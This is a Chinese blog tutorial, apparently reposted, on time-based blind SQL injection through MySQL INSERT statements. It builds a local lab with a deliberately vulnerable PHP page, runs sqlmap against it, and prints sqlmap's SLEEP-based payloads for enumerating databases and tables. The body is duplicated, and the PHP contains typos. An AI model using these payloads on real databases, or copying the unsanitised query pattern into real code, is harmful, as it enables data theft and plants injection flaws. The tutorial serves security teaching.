mysql insert延时注入

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日21:04:16评论423 views字数 1356阅读4分31秒阅读模式
摘要

首先建个数据库和一张表:

create database blog;
 
create table admin(id int primary key auto_increment,email varchar(500));
写个insert.php方便sqlmap跑:
<?php
$conn=mysql _connect("localhost","root ","yourpass");
mysql_select_db("admin",$conn);
if(isset($_GET["email"])){
     $email=$_GET['email'];
     mysql _query("insert into admin(email) values('$emal')");
}
?>
用seay的mysql监控来监控数据库执行的语句,这样比抓包要方便一些。
sqlmap -u http://127.0.0.1/[email protected]
测试出延时注入,payload是[email protected]’ and sleep(5) and ‘ufwy’=’ufwy
那么对应的数据库执行语句就应该为:
 
 
insert into admin(email) values('[email protected]' and sleep(5) and 'ufwy'='ufwy');
在mysql监控里查看下它是怎么跑–dbs的:

insert into admin(email)values('[email protected]' AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND 'XDSc'='XDSc')
 
 
 
insert into admin(email)values('[email protected]' AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND 'ngXr'='ngX r')
-D blog –tables
 
 
insert into admin(email)values('[email protected]' AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')
-D blog -T admin –dump

果没有跑出来,延时注入的局限性太大了,当然也有insert报错注入 的情况,只是不适合上面这种情况。
 
总之insert into延时注入的核心就是:
insert into blog(email) values('[email protected]' and if(true,sleep(5),0);

首先建个数据库和一张表:

create database blog;
 
create table admin(id int primary key auto_increment,email varchar(500));
写个insert.php方便sqlmap跑:
<?php
$conn=mysql_connect("localhost","root","yourpass");
mysql_select_db("admin",$conn);
if(isset($_GET["email"])){
     $email=$_GET['email'];
     mysql_query("insert into admin(email) values('$emal')");
}
?>
用seay的mysql监控来监控数据库执行的语句,这样比抓包要方便一些。
sqlmap -u http://127.0.0.1/[email protected]
测试出延时注入,payload是[email protected]’ and sleep(5) and ‘ufwy’=’ufwy
那么对应的数据库执行语句就应该为:
 
 
insert into admin(email) values('[email protected]' and sleep(5) and 'ufwy'='ufwy');
在mysql监控里查看下它是怎么跑–dbs的:

insert into admin(email)values('[email protected]' AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND 'XDSc'='XDSc')
 
 
 
insert into admin(email)values('[email protected]' AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND 'ngXr'='ngXr')
-D blog –tables
 
 
insert into admin(email)values('[email protected]' AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')
-D blog -T admin –dump

果没有跑出来,延时注入的局限性太大了,当然也有insert报错注入的情况,只是不适合上面这种情况。
 
总之insert into延时注入的核心就是:
insert into blog(email) values('[email protected]' and if(true,sleep(5),0);

来源 未知

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:04:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   mysql insert延时注入https://cn-sec.com/archives/72134.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息